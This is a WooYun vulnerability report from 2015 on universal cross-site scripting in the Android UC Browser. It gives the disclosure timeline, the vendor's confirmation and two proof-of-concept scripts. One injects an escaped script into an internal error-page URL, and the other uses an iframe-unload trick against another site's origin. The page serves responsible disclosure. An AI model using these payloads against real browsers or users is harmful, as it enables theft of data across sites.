当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145437

漏洞标题:UC浏览器跨域脚本漏洞

相关厂商:UC Mobile

漏洞作者: Lyleaks

提交时间:2015-10-09 12:38

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-09: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-15: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-06: 细节向核心白帽子及相关领域专家公开
2015-12-16: 细节向普通白帽子公开
2015-12-26: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

买了一个CloudEye,然后就没WB进zone了。。。

详细说明:

WooYun: UC浏览器跨域脚本漏洞 之前发的一个洞,新版又只是把非同域不能新建窗口的限制给加上了,依然可以绕过。

Screenshot_2015-10-08-21-41-31.png


只要先打开一个同域的窗口,然后在replace就行了,POC如下:

<a href=javascript:foo()>Test it!</a>
<script>
var w;
var t;

function foo(){
w = window.open("http://utf7.ml");
w.location.replace("http://www.wooyun.org");
t = setInterval('bar()',100);
}

function bar(){
if (w.location.href !== 'about:blank') {
w.location='ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.example.com/;IP=#\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0064\u006f\u006d\u0061\u0069\u006e\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e;IPNum=1; ;FailReason=1;ErrorCode=1;';
clearInterval(t);
}
}
</script>


Screenshot_2015-10-08-21-55-31.png


Screenshot_2015-10-08-21-55-54.png


还有很久前的一个UXSS,不知道为什么新版又出现了。
https://code.google.com/p/chromium/issues/detail?id=143439

<body>
<script>
parentFrame = document.body.appendChild(document.createElement("iframe"));
helperFrame1 = parentFrame.contentDocument.body.appendChild(document.createElement("iframe"));
helperFrame1.contentWindow.onunload = function() {
container = document.createElement("div");
targetFrame = container.appendChild(document.createElement("iframe"));
helperFrame2 = targetFrame.appendChild(document.createElement("iframe"));
helperFrame2.src = "javascript:top.container.removeChild(top.targetFrame)";
parentFrame.contentDocument.body.appendChild(container);
}
parentFrame.src = "http://m.baidu.com";
parentFrame.onload = function() {
parentFrame.onload = null;
targetFrame.srcdoc = "<script>alert(parent.document.domain)<\/script>";
targetFrame.contentWindow.location = "about:srcdoc";
}
</script>
</body>


Screenshot_2015-10-08-21-59-55.png


漏洞证明:

访问
http://utf7.ml/t/uc4.html
http://utf7.ml/t/f.html
点击
Test it!
测试版本

Screenshot_2015-10-08-22-06-25.png

修复方案:

版权声明:转载请注明来源 Lyleaks@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-12 15:44

厂商回复:

您好,漏洞已确认,正在修复中。感谢您对阿里巴巴安全的关注和支持。

最新状态:

暂无


漏洞评价:

评价

  1. 2015-10-09 12:51 | 数据流 认证白帽子 ( 普通白帽子 | Rank:738 漏洞数:93 | 没关系啊,我们还有音乐)

    是安卓版的uc吗。

  2. 2015-10-18 01:22 | Lyleaks ( 普通白帽子 | Rank:167 漏洞数:12 | 我都是按照基本法发洞的)

    @数据流 是